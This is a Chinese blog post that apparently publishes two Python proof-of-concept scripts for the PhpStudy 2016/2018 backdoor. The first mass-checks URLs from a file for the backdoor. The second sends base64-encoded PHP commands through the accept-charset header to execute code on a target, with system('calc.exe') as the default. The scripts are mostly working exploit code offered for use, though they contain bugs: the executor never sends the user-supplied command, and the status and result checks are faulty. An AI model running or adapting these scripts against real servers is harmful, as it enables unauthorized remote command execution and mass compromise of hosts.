PhpStudy2016&2018后门检测和执行POC脚本 python

    选择打赏方式

后门检测脚本python

# !/usr/bin/env python # -*- coding:utf-8 -*- import gevent from gevent import monkey

gevent.monkey.patch_all() import requests as rq def file_read(file_name="url.txt"): with open(file_name, "r") as f: return [i.replace("\n", "") for i in f.readlines()] def check(url): '''
    if "http://" or "https://" not in url:
        url = "https://" + url
    ''' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==', # 输出 eeSzxu92nIDAb 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9',
    } try:
        res = rq.get(url, headers=headers, timeout=20) if res.status_code == 200: if res.text.find('eeSzxu92nIDAb'):
                print("[存在漏洞] " + url) except:
        print("[超时] " + url) if __name__ == '__main__':
    print("phpStudy 批量检测 (需要 gevent,requests 库)")
    print("使用之前,请将URL保存为 url.txt 放置此程序同目录下")
    input("任意按键开始执行..")
    tasks = [gevent.spawn(check, url) for url in file_read()]
    print("正在执行...请等候")
    gevent.joinall(tasks)
    wait = input("执行完毕 任意键退出...") 

后门执行脚本python

# !/usr/bin/env python # -*- coding:utf-8 -*- import requests import base64 def backdoor(url, command="system('calc.exe');"): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==', 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    command = base64.b64encode(command.encode('utf-8'))
    command = str(command, 'utf-8')
    result = requests.get(url, headers=headers, verify=False) if result.status_code == "200":
        print("执行完成")
    a = input("任意键退出...")

url = input("输入URL(例如:http://127.0.0.1:228/xx.php)\n")
command = input("输入命令 默认为 system('calc.exe'); (不想输入直接回车)\n")
backdoor(url, command) 

版权声明:若无特殊注明,本文皆为《 奶沫 》原创,转载请保留文章出处。
本文链接:PhpStudy2016&2018后门检测和执行POC脚本 python https://itho.cn/ldqb/218.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框

吃奶的力气提交吐槽中...


既然没有吐槽,那就赶紧抢沙发吧!